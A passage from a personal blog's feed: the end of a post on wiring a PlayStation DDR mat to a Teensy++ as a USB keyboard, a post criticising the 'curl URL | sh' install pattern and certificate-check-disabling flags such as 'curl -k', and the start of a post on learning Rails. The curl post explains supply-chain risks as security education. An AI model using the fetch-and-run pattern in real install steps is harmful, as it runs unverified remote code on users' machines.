<th style="text-align: center;">DB25 #</th>
<th style="text-align: center;">PSX #</th>
<th style="text-align: center;">Function</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center;">orange</td>
<td style="text-align: center;">2</td>
<td style="text-align: center;">8</td>
<td style="text-align: center;">Command</td>
</tr>
<tr>
<td style="text-align: center;">yellow</td>
<td style="text-align: center;">3</td>
<td style="text-align: center;">4</td>
<td style="text-align: center;">Select</td>
</tr>
<tr>
<td style="text-align: center;">blue</td>
<td style="text-align: center;">4</td>
<td style="text-align: center;">3</td>
<td style="text-align: center;">Clock</td>
</tr>
<tr>
<td style="text-align: center;">pink</td>
<td style="text-align: center;">5-9 <a href="#fn1" class="footnote-ref" id="fnref1" role="doc-noteref"><sup>1</sup></a></td>
<td style="text-align: center;">5</td>
<td style="text-align: center;">Vcc</td>
</tr>
<tr>
<td style="text-align: center;">brown</td>
<td style="text-align: center;">11</td>
<td style="text-align: center;">9</td>
<td style="text-align: center;">Data</td>
</tr>
<tr>
<td style="text-align: center;">black</td>
<td style="text-align: center;">19-25</td>
<td style="text-align: center;">6</td>
<td style="text-align: center;">Ground</td>
</tr>
<tr>
<td style="text-align: center;">green</td>
<td style="text-align: center;">NC</td>
<td style="text-align: center;"></td>
<td style="text-align: center;"></td>
</tr>
</tbody>
</table>
<p>At first, I was worried by the green wire that was not connected but this
confirms that it was not needed.</p>
<h2 id="connecting-it-to-the-teensy">Connecting it to the teensy++</h2>
<p>The teensy++ is a development board with an AT90USB1286 microcontroller, from
the AVR family. It has many GPIO ports, so I had to make a choice regarding the
pins to be used. I chose this pinout:</p>
<table>
<thead>
<tr>
<th style="text-align: center;">AVR port</th>
<th style="text-align: center;">Color</th>
<th style="text-align: center;">Function</th>
<th style="text-align: center;">Direction</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center;">Vcc</td>
<td style="text-align: center;">pink</td>
<td style="text-align: center;">Vcc</td>
<td style="text-align: center;">Power</td>
</tr>
<tr>
<td style="text-align: center;">GND</td>
<td style="text-align: center;">black</td>
<td style="text-align: center;">Ground</td>
<td style="text-align: center;">Power</td>
</tr>
<tr>
<td style="text-align: center;">PC0</td>
<td style="text-align: center;">brown</td>
<td style="text-align: center;">Data</td>
<td style="text-align: center;">D→H</td>
</tr>
<tr>
<td style="text-align: center;">PC1</td>
<td style="text-align: center;">orange</td>
<td style="text-align: center;">Command</td>
<td style="text-align: center;">H→D</td>
</tr>
<tr>
<td style="text-align: center;">PC2</td>
<td style="text-align: center;">yellow</td>
<td style="text-align: center;">Select</td>
<td style="text-align: center;">H→D</td>
</tr>
<tr>
<td style="text-align: center;">PC3</td>
<td style="text-align: center;">blue</td>
<td style="text-align: center;">Clock</td>
<td style="text-align: center;">H→D</td>
</tr>
</tbody>
</table>
<p>The Data signal is the only one that goes from the Device (DDR mat) to the Host
(microcontroller), but since each pin can be used as an input or as an output,
this does not constrain the choice.</p>
<p>So, let’s connect the DDR mat to the microcontroller. As the board already has
male pin headers for breadboard usage, I soldered female pin headers to wires.</p>
<figure>
<img src="/img/ddr/wires.jpg" alt="Female pin headers on wires. A bit backwards, I know." />
<figcaption aria-hidden="true">Female pin headers on wires. A bit backwards, I know.</figcaption>
</figure>
<figure>
<img src="/img/ddr/assembled.jpg" alt="The completed adapter. The spoon was used to unplug the board from a piece of breadboard. And for breakfast, earlier." />
<figcaption aria-hidden="true">The completed adapter. The spoon was used to unplug the board from a piece of
breadboard. And for breakfast, earlier.</figcaption>
</figure>
<h2 id="programming-the-teensy">Programming the teensy++</h2>
<p>I had two main problems writing the firmware: first, the manufacturer seems to
recommend <a href="https://www.pjrc.com/teensy/loader.html">Teensy Loader</a> to program the microcontroller. This is a GUI app and
which does not seem to be free software. Fortunately, I found a packaged version
of <a href="https://github.com/raphendyr/teensy-loader-cli">teensy-loader-cli</a> which is CLI, GPL3, and works well. The following command
will program the microcontroller:</p>
<pre><code>teensy-loader-cli -mmcu=at90usb1286 blink_slow_Teensy2pp.hex</code></pre>
<p>The second quirk is that most of the documentation that can be found is for
using the teensy++ as an Arduino. But I prefer writing low-level code: just
memory-mapped registers, a C compiler, and me. So I aptitude-installed <code>gcc-avr</code>
and <code>avr-lib</code> and opened vim.</p>
<p>There are several differences in how you program microcontrollers as an Arduino
and as a plain AVR. For example here is how you configure PC0 to be an input
with a pull-up resistor (so that it reads 1 when the pin is disconnected):</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a>DDRC <span class="op">&amp;=</span> <span class="op">~(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> PC0<span class="op">);</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a>PORTC <span class="op">|=</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> PC0<span class="op">);</span></span></code></pre></div>
<p>This clears bit PC0 of register DDRC (Data Direction Register C, nothing to do
with Dance Dance Revolution) and sets bit PC0 of the PORTC register. Instead, the
corresponding Arduino code is:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a>pinMode<span class="op">(</span><span class="dv">10</span><span class="op">,</span> INPUT_PULLUP<span class="op">);</span></span></code></pre></div>
<p>To do that, the library has a mapping from pin numbers (an Arduino-specific
terminology, it seems) to register names.</p>
<h2 id="the-psx-protocol">The PSX protocol</h2>
<p>Time to write the code itself. My absolute reference for programming and
interfacing the Playstation is <a href="http://www.raphnet.net/electronique/psx_adaptor/Playstation.txt">Everything You Have Always Wanted to Know about
the Playstation But Were Afraid to
Ask</a>. See
section 9 for controllers.</p>
<p>The idea is that every frame (16 ms), Select becomes low, and bytes are
transfered, LSB first, in a synchronous way over the Command (D→H) and Data
(H→D) pins. Select becomes high back again after all bytes are transfered.</p>
<p>This means that every time a bit is transfered to the gamepad, a bit is read at
the same time. For every bit, the following operations are needed:</p>
<ul>
<li>set Command according to the bit to transmit;</li>
<li>put Clock down;</li>
<li>wait half a clock cycle;</li>
<li>read Data: that is the bit received;</li>
<li>put Clock up;</li>
<li>wait half a clock cycle.</li>
</ul>
<p>Or, if you prefer in C:</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="dt">static</span> <span class="dt">uint8_t</span> transmit<span class="op">(</span><span class="dt">uint8_t</span> in<span class="op">)</span></span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a><span class="op">{</span></span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a>        <span class="dt">uint8_t</span> out <span class="op">=</span> <span class="dv">0</span><span class="op">;</span></span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a>        <span class="cf">for</span> <span class="op">(</span><span class="dt">int</span> i <span class="op">=</span> <span class="dv">0</span><span class="op">;</span> i <span class="op">&lt;</span> <span class="dv">8</span> <span class="op">;</span> i<span class="op">++)</span> <span class="op">{</span></span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a>                <span class="dt">int</span> bit_in <span class="op">=</span> in <span class="op">&amp;</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> i<span class="op">);</span></span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a>                <span class="cf">if</span> <span class="op">(</span>bit_in<span class="op">)</span> <span class="op">{</span></span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a>                        signal_up<span class="op">(</span>PSX_PIN_CMD<span class="op">);</span></span>
<span id="cb5-8"><a href="#cb5-8" aria-hidden="true" tabindex="-1"></a>                <span class="op">}</span> <span class="cf">else</span> <span class="op">{</span></span>
<span id="cb5-9"><a href="#cb5-9" aria-hidden="true" tabindex="-1"></a>                        signal_down<span class="op">(</span>PSX_PIN_CMD<span class="op">);</span></span>
<span id="cb5-10"><a href="#cb5-10" aria-hidden="true" tabindex="-1"></a>                <span class="op">}</span></span>
<span id="cb5-11"><a href="#cb5-11" aria-hidden="true" tabindex="-1"></a>                signal_down<span class="op">(</span>PSX_PIN_CLOCK<span class="op">);</span></span>
<span id="cb5-12"><a href="#cb5-12" aria-hidden="true" tabindex="-1"></a>                _delay_us<span class="op">(</span>DELAY_CLOCK_US<span class="op">);</span></span>
<span id="cb5-13"><a href="#cb5-13" aria-hidden="true" tabindex="-1"></a>                <span class="dt">int</span> bit_out <span class="op">=</span> signal_read<span class="op">(</span>PSX_PIN_DATA<span class="op">);</span></span>
<span id="cb5-14"><a href="#cb5-14" aria-hidden="true" tabindex="-1"></a>                <span class="cf">if</span> <span class="op">(</span>bit_out<span class="op">)</span> <span class="op">{</span></span>
<span id="cb5-15"><a href="#cb5-15" aria-hidden="true" tabindex="-1"></a>                        out <span class="op">|=</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> i<span class="op">);</span></span>
<span id="cb5-16"><a href="#cb5-16" aria-hidden="true" tabindex="-1"></a>                <span class="op">}</span> <span class="cf">else</span> <span class="op">{</span></span>
<span id="cb5-17"><a href="#cb5-17" aria-hidden="true" tabindex="-1"></a>                        out <span class="op">&amp;=</span> <span class="op">~(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> i<span class="op">);</span></span>
<span id="cb5-18"><a href="#cb5-18" aria-hidden="true" tabindex="-1"></a>                <span class="op">}</span></span>
<span id="cb5-19"><a href="#cb5-19" aria-hidden="true" tabindex="-1"></a>                signal_up<span class="op">(</span>PSX_PIN_CLOCK<span class="op">);</span></span>
<span id="cb5-20"><a href="#cb5-20" aria-hidden="true" tabindex="-1"></a>                _delay_us<span class="op">(</span>DELAY_CLOCK_US<span class="op">);</span></span>
<span id="cb5-21"><a href="#cb5-21" aria-hidden="true" tabindex="-1"></a>        <span class="op">}</span></span>
<span id="cb5-22"><a href="#cb5-22" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> out<span class="op">;</span></span>
<span id="cb5-23"><a href="#cb5-23" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>During a normal operation, the bytes exchanged should be the following:</p>
<table>
<thead>
<tr>
<th style="text-align: center;">Byte #</th>
<th style="text-align: center;">Command</th>
<th style="text-align: center;">Data</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center;">1</td>
<td style="text-align: center;">0x01</td>
<td style="text-align: center;">0xFF</td>
</tr>
<tr>
<td style="text-align: center;">2</td>
<td style="text-align: center;">0x42</td>
<td style="text-align: center;">0x41</td>
</tr>
<tr>
<td style="text-align: center;">3</td>
<td style="text-align: center;">0x00</td>
<td style="text-align: center;">0x5A</td>
</tr>
<tr>
<td style="text-align: center;">4</td>
<td style="text-align: center;">0x00</td>
<td style="text-align: center;">data1</td>
</tr>
<tr>
<td style="text-align: center;">5</td>
<td style="text-align: center;">0x00</td>
<td style="text-align: center;">data2</td>
</tr>
</tbody>
</table>
<p>Keypress information can be found in the 16-bit number <code>(data2 &lt;&lt; 8) | data1)</code>.
If a bit is 0, it means that the corresponding button is pressed.</p>
<table>
<thead>
<tr>
<th style="text-align: center;">Bit #</th>
<th style="text-align: center;">Key</th>
<th style="text-align: center;">Bit #</th>
<th style="text-align: center;">Key</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center;">0</td>
<td style="text-align: center;">Select</td>
<td style="text-align: center;">8</td>
<td style="text-align: center;">L2</td>
</tr>
<tr>
<td style="text-align: center;">1</td>
<td style="text-align: center;">(always 1)</td>
<td style="text-align: center;">9</td>
<td style="text-align: center;">R2</td>
</tr>
<tr>
<td style="text-align: center;">2</td>
<td style="text-align: center;">(always 1)</td>
<td style="text-align: center;">10</td>
<td style="text-align: center;">L1</td>
</tr>
<tr>
<td style="text-align: center;">3</td>
<td style="text-align: center;">Start</td>
<td style="text-align: center;">11</td>
<td style="text-align: center;">R1</td>
</tr>
<tr>
<td style="text-align: center;">4</td>
<td style="text-align: center;">Up</td>
<td style="text-align: center;">12</td>
<td style="text-align: center;">Triangle</td>
</tr>
<tr>
<td style="text-align: center;">5</td>
<td style="text-align: center;">Right</td>
<td style="text-align: center;">13</td>
<td style="text-align: center;">Circle</td>
</tr>
<tr>
<td style="text-align: center;">6</td>
<td style="text-align: center;">Down</td>
<td style="text-align: center;">14</td>
<td style="text-align: center;">Cross</td>
</tr>
<tr>
<td style="text-align: center;">7</td>
<td style="text-align: center;">Left</td>
<td style="text-align: center;">15</td>
<td style="text-align: center;">Square</td>
</tr>
</tbody>
</table>
<p>At first, it was not obvious how to debug the implementation of this protocol.
Fortunately, this microcontroller has a USB port and it is possible to transmit
debug messages using the <a href="https://www.pjrc.com/teensy/usb_debug_only.html">usb_debug_only</a> code sample from the manufacturer.</p>
<p>With no real surprise, my first iteration did not work and printed the
following.</p>
<pre><code>01 -&gt; FF
42 -&gt; FF
00 -&gt; FF
00 -&gt; FF
00 -&gt; FF</code></pre>
<p>I re-read my code carefully and I found two bugs:</p>
<ul>
<li>I was not putting Clock back up.</li>
<li>I was using PORTC for reading input even though PINC was needed… the
registers are mapped in memory but not at the same address for reading and
writing. Rookie mistake.</li>
</ul>
<p>After reprogramming and reloading I saw a satisfying output:</p>
<pre><code>01 -&gt; FF
42 -&gt; 41
00 -&gt; 5A
00 -&gt; FF
00 -&gt; DF</code></pre>
<p>The output bytes correspond to the device ID part (41 5A) and a value (FF DF)
that indicates that nothing is pressed except the Circle button.</p>
<h2 id="interfacing-with-the-computer">Interfacing with the computer</h2>
<p>At that moment the firmware just computes the result and prints it over USB. To
do something useful with it on the computer side, this information needs to be
exposed as a USB joystick or keyboard. I used the <a href="https://www.pjrc.com/teensy/usb_keyboard.html">usb_keyboard</a> code sample
which exports a <code>usb_keyboard_press</code> function.</p>
<p>It was necessary to slightly alter the main loop: in a debug setting it is
possible to print the state at every frame, but a keyboard works differently.
You are supposed to send a message only when a key is pressed. So, at each
frame, it is necessary to keep track of the previous state and to diff it with
the current one. If a bit was previously set (meaning that the button is not
pressed) and is now set, the USB code has to be notified that a key was pressed.
This code is run for every <code>btn</code> if the state changes:</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="dt">int</span> was_released <span class="op">=</span> last_js <span class="op">&amp;</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> btn<span class="op">);</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a><span class="dt">int</span> is_pressed <span class="op">=</span> <span class="op">!(</span>js <span class="op">&amp;</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> btn<span class="op">));</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="op">(</span>was_released <span class="op">&amp;&amp;</span> is_pressed<span class="op">)</span> <span class="op">{</span></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a>        <span class="dt">int</span> key <span class="op">=</span> mapping<span class="op">[</span>btn<span class="op">];</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a>        usb_keyboard_press<span class="op">(</span>key<span class="op">,</span> <span class="dv">0</span><span class="op">);</span></span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>This is simple, yet it works quite well and is enough to play <a href="http://www.stepmania.com/">Stepmania</a>!</p>
<p>I noticed that however it does not work perfectly since the key is released
immediately: this is a problem for DDR since the patterns where you have to hold
keys do not work.</p>
<p>Let’s have a look at this function from the library:</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="dt">int8_t</span> usb_keyboard_press<span class="op">(</span><span class="dt">uint8_t</span> key<span class="op">,</span> <span class="dt">uint8_t</span> modifier<span class="op">)</span></span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a><span class="op">{</span></span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a>        <span class="dt">int8_t</span> r<span class="op">;</span></span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a>        keyboard_modifier_keys <span class="op">=</span> modifier<span class="op">;</span></span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a>        keyboard_keys<span class="op">[</span><span class="dv">0</span><span class="op">]</span> <span class="op">=</span> key<span class="op">;</span></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>        r <span class="op">=</span> usb_keyboard_send<span class="op">();</span></span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> <span class="op">(</span>r<span class="op">)</span> <span class="cf">return</span> r<span class="op">;</span></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a>        keyboard_modifier_keys <span class="op">=</span> <span class="dv">0</span><span class="op">;</span></span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>        keyboard_keys<span class="op">[</span><span class="dv">0</span><span class="op">]</span> <span class="op">=</span> <span class="dv">0</span><span class="op">;</span></span>
<span id="cb9-10"><a href="#cb9-10" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> usb_keyboard_send<span class="op">();</span></span>
<span id="cb9-11"><a href="#cb9-11" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>When <code>usb_keyboard_send</code> is called, it transmits the contents of <code>keyboard_keys</code>
over USB. All nonzero elements correspond to keys that are pressed. So what this
function does is transmit a state where a key is pressed, then transmit a state
where nothing is pressed.</p>
<p>This has two limitations:</p>
<ul>
<li>it does not separate key press from key release;</li>
<li>it does not work if several keys are pressed at once.</li>
</ul>
<h2 id="making-rollover-work">Making rollover work</h2>
<p>It would be nice to implement n-key rollover (NKRO) so that all keys can be
pressed independently. This is possible, by increasing the size of
<code>keyboard_keys</code> to 14 (the number of keys on a Playstation gamepad). But this
means fiddling with the USB descriptor code, so that the USB host side can know
how many bytes to expect, and I am not really comfortable with that.</p>
<p>In the library, the size of <code>keyboard_keys</code> is 6, so I stuck with 6-key rollover
which ought to be enough for everybody.</p>
<p>Here is the new version of the code that is called for every button:</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="dt">int</span> was_pressed <span class="op">=</span> <span class="op">!(</span>last_js <span class="op">&amp;</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> i<span class="op">));</span></span>
<span id="cb10-2"><a href="#cb10-2" aria-hidden="true" tabindex="-1"></a><span class="dt">int</span> is_pressed <span class="op">=</span> <span class="op">!(</span>js <span class="op">&amp;</span> <span class="op">(</span><span class="dv">1</span> <span class="op">&lt;&lt;</span> i<span class="op">));</span></span>
<span id="cb10-3"><a href="#cb10-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb10-4"><a href="#cb10-4" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="op">(</span>is_pressed <span class="op">&amp;&amp;</span> <span class="op">!</span>was_pressed<span class="op">)</span> <span class="op">{</span></span>
<span id="cb10-5"><a href="#cb10-5" aria-hidden="true" tabindex="-1"></a>        keypress_add<span class="op">(</span>mapping<span class="op">[</span>i<span class="op">]);</span></span>
<span id="cb10-6"><a href="#cb10-6" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span>
<span id="cb10-7"><a href="#cb10-7" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="op">(</span>was_pressed <span class="op">&amp;&amp;</span> <span class="op">!</span>is_pressed<span class="op">)</span> <span class="op">{</span></span>
<span id="cb10-8"><a href="#cb10-8" aria-hidden="true" tabindex="-1"></a>        keypress_remove<span class="op">(</span>mapping<span class="op">[</span>i<span class="op">]);</span></span>
<span id="cb10-9"><a href="#cb10-9" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>The <code>keypress_add</code> function walks the <code>keyboard_keys</code> array and replace the
first 0 with the correct button. <code>keypress_remove</code> does the opposite.</p>
<p>And… this works! I found this very refreshing to write low-level code for an
existing, documented protocol. If you are interested, all the code can be found
in this <a href="https://github.com/emillon/psx-usb">github repository</a>. Thanks for reading!</p>
<section id="footnotes" class="footnotes footnotes-end-of-document" role="doc-endnotes">
<hr />
<ol>
<li id="fn1"><p>Protected by 1N4148 diodes.<a href="#fnref1" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
</ol>
</section>]]></description>
    <pubDate>Thu, 27 Nov 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-11-27-converting-a-dance-dance-revolution-mat-to-usb.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>On the curl | sh pattern</title>
    <link>http://blog.emillon.org/posts/2014-12-27-on-the-curl-sh-pattern.html</link>
    <description><![CDATA[<p>Like many, I noticed a common pattern in the past few years: software authors
publishing instructions to download and install their program from their
website, directly in the terminal, through a variant of <code>curl URL | sh</code>.</p>
<p>Since I think that it should be considered bad practice, I created a tumblr
called “<a href="http://curlpipesh.tumblr.com/">curl | sh</a>” which lists occurrences of this pattern.</p>
<p>I would like to address some of the criticism I received about this list.
Most came from Hacker News where <a href="https://news.ycombinator.com/item?id=8550511">it has been posted</a>.</p>
<h3 id="if-the-url-starts-with-https-it-is-secure">“If the URL starts with HTTPS, it is secure”</h3>
<p>The websites I post here fall roughly into three categories:</p>
<ol type="1">
<li>downloads over HTTP.</li>
<li>downloads over HTTPS with certificate verification deactivated
(<code>curl -k</code>/<code>--insecure</code>, <code>wget --no-check-certificate</code>).</li>
<li>downloads over HTTPS.</li>
</ol>
<p>Type 1 downloads are the most insecure ones, since it is possible to change the
original response from the server without the client noticing. Modifying traffic
like this is very easy, for example on wifi hotspots. This is not something that
happens only in hacker movies: some places use this to insert ads in web pages.</p>
<p>Type 2 downloads are a bit better since the content is encrypted, but encryption
without authentication is mostly useless since you do not know who you are
talking to. The client will connect to anything that responds to url:443, which
means that it is still possible to spoof a connection and actively change the
response. To the client, an encrypted connection to an attacker looks the same
as an encrypted connection to the legit site.</p>
<p>Type 3 downloads prevent this because they require that the certificate
presented by the server matches the server name and is signed by a trusted
Certificate Authority (CA). This means that the certificate has been handed to
the person in charge of the website.</p>
<p>This is not foolproof either because the client has to trust a list of root CAs.
This can be a problem for example in corporate environments, where the company
can include their own CA to this list of trusted roots. At every HTTPS
connection, they can create on the fly a certificate that is signed by
themselves and with the correct server name. In other words, they can vouch for
the identity of any website. As a consequence, they are able to spoof the TLS
connection, in the same way that it is possible for type 2 downloads. Having a
rogue trusted root is almost the same as disabling certification checking since
it is able to create correct certificates for any site.</p>
<p>A way to mitigate this problem is to enable certificate pinning, which alerts
the user when the certificate presented by a website has changed since the last
time they consulted it. But this is not a perfect solution, since there are
legitimate reasons to change a certificate. For example, they are usually
limited in time, and every year or so it is necessary to generate a new one.
However, if a website presents a certificate with a different anchor than
before, this may mean that the connection is being spoofed.</p>
<p>Note that the main reason people disable certificate checking (i.e., use type 2
instead of type 3) is because they use self-signed certificates. These are
certificates that are not signed by a CA. They are free and simpler to use, but
do not authenticate the server, so they are rejected by default by clients. In
browsers, this sometimes corresponds to a big scary warning, and by a yellow or
open lock instead of the green, closed lock that we have all been educated to
respect. It is however possible to pin them, so it is better than plain HTTP.
The effort required to spoof a self-signed certificate is also greater than to
spoof plain HTTP, but both are reasonably easy.</p>
<h3 id="apt-get-install-pkg-does-the-same-thing">“apt-get install $pkg does the same thing”</h3>
<p>Not exactly. When you install a package from the Debian archive, the .deb file
is retrieved along with a digital signature that authenticates the file. This
signature is checked against a key that is on all Debian systems. You obtain it
at install time on a CD, but you can easily get it from another trusted Debian
system if you can not trust a CD from some reason. The key here (pun intended)
is that this scheme authenticates files and not connections.</p>
<p>For example, if a HTTPS website is compromised, you will not be able to detect
that the files have been modified on the server (and thus <code>curl | sh</code> will work
as before). But if your local Debian mirror is compromised, the files you
download will fail to validate against the key that is on your computer.</p>
<p>Of course, a signature from the Debian archive signing key does not
automatically ensure that the package will not delete your root filesystem. But
it ensures that the software has not been tampered with since its maintainer has
uploaded it. Also, since it goes through a distribution, you may expect that
some quality assurance has been made there.</p>
<p>It is hard to distribute software in a secure manner. Protecting the connection
is definitely a first step, but protecting the files themselves is better.
Fortunately it is possible to take this further, by having reproducible builds
for example. I highly encourage anyone to read the <a href="https://defuse.ca/triangle-of-secure-code-delivery.htm">triangle of secure code
delivery</a> on what it takes to deliver programs in a secure manner.</p>
<p>In the meantime, feel free to send me more examples of this pattern so that I
can publish them. Get in touch either directly on <a href="http://curlpipesh.tumblr.com/">curl | sh</a>, on <a href="https://twitter.com/etiennemillon">twitter</a> or
by email (see the footer below). Thanks for reading!</p>]]></description>
    <pubDate>Sat, 27 Dec 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-12-27-on-the-curl-sh-pattern.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Santa made me learn Rails in a week</title>
    <link>http://blog.emillon.org/posts/2015-04-03-santa-made-me-learn-rails-in-a-week.html</link>
    <description><![CDATA[<p><strong>Abstract:</strong> <em>I released <a href="https://secretsantacreator.herokuapp.com/">Secret Santa Creator</a>, a free website to organize
events where every participant makes a gift to a random other one. To do that I
learnt Ruby on Rails in a week and it was awesome. As usual I put <a href="https://github.com/emillon/secret-santa">the source on
Github</a>.</em></p>
<hr />
<p>Every year I take part in Secret Santa: within a group of friends, everyone has
a “target” to whom he has to make a gift.</p>
<p>There are several techniques to organize that. The simplest one is to have
anyone put their name in a hat, shuffle everything, and have everyone pick one
name. But to do that, you need to put everyone in the same room before the event
and that is not always convenient. Another possibility is to ask someone to pick
the names, but he will know who has to make a gift to him.</p>
<p>So last year, I decided to script this. I made a small python script that takes
a list of names and emails, shuffles them and sends email to the correct
persons. It worked well. Technically, I could know who was supposed to make me a
gift by watching my mail logs, but short of sophisticated cryptographic
protocols, you have to trust the organizer not to cheat anyway.</p>
<p>In a way, this was a good MVP; but it was not very reusable. Indeed, some
friends asked me the program so that they could use it with other friends, but I
could not expect everybody to have python and sendmail installed on their
machines. To cover their needs, it turns out that there are a lot of websites
that offer this service, so I ended up pointing them to these websites.</p>
<p>This year, I was asked again about how to organize a Secret Santa, so I figured,
why not build a website? This had the opportunity to be directly useful to my
friends, so I jumped in. Plus, this was a good excuse to learn new technologies.
I gave myself one week to learn Ruby on Rails, code the website and deploy it on
Heroku. That is what the cool kids do, right?</p>
<p>My web stack of choice usually revolves around Flask, which is simple and
powerful, but it does not do a lot of things out of the box. That is one the
strengths of this microframework, but I wanted to try something more integrated.
Django would have been a good choice too, but I was curious about Ruby on Rails
and the Ruby ecosystem in general.</p>
<p>I had bookmarked the <a href="https://www.railstutorial.org/book">Ruby on Rails Tutorial</a> by Michael Hartl, which seemed a
good resource. Indeed, it is very nice, seems it is up to date and emphasizes
not only on the code but also on how to deploy a project, or even how to keep a
project under source control. When you learn a new technology, it is not obvious
which files should get checked in. If you asked me before, I would probably have
put <code>Gemfile.lock</code> out of git.</p>
<p>The book uses particular versions of the different gems, so this has been tested
and works flawlessly. At first I was afraid to have to use rvm, which I heard
does not work too well. I prefer using a ruby interpreter provided by my
distribution, but I am OK with using third-party gems. That is my policy for
Python too: I use a system python and a virtualenv for each project. Ruby’s
bundler seems to work like this.</p>
<p>I was very pleased by the first chapter of the book which explains how to write
a minimal rails site and immediately deploying it to Heroku. I found it
astonishing that to do that, absolutely zero configuration was needed. That is
in part thanks to Rails’ <a href="https://en.wikipedia.org/wiki/Convention_over_configuration">Convention over Configuration</a> philosophy and in part
because Heroku is made for Rails app by default.</p>
<p>By contrast, to deploy a Flask app these days on a server I control, I have to
write an Ansible playbook. Mostly copy &amp; pasted from previous projects but
still, the friction is incomparable. This is not specific to Rails though, so I
may use Heroku for Python one-off projects too now.</p>
<p>The rest of the book focuses on creating a microblog site, first using the
scaffold technique and then by hand.</p>
<p>I liked that there is a lot of structure in Rails application: everything has a
“correct place” and there is a clear separation between everything. Even tests
are automatically separated into different folders. Also, I have not created a
single <code>.rb</code> file by hand; everything was created by <code>rails generate</code>. This is
the sweet spot between having to do everything by hand and coding in an IDE.</p>
<p>As for the Ruby language itself, I figured that I would learn it on the fly
since it is similar enough to Python. That worked out well.</p>
<p>I like the <code>:symbols</code> a lot, they remind me of Lisp. It makes a clear
distinction between strings used as keys and strings that are meant to be
printed. I am not a fan of the colon syntax itself, especially when they are
mixed with hashes (<code>k: :v</code>) but syntax highlighting helps in that case of
course.</p>
<p>The concrete syntax is a bit weird. I like the explicit <code>end</code>, but I am still
not sure whether whitespace is significant. Same goes for expressions: it is a
bit unclear when parentheses are needed. I think that it is the same as in
Coffeescript. I hope that it is not ambiguous and that bugs arising from that
are rare.</p>
<p>That should be covered by tests anyway. The book encourages to write a lot of
tests, which is quite nice. The testing ecosystem is interesting, particularly
minitest and guard, which make TDD very easy. Guard is a bit too aggressive,
which means that it will sometimes not run all the needed tests. This is
probably just a matter of writing a better <code>Guardfile</code>.</p>
<p>Anyway, I went through chapters 1 to 9 and it was enough to get a good grasp of
how to code a Rails site.</p>
<p>The website I wanted to write would work like this:</p>
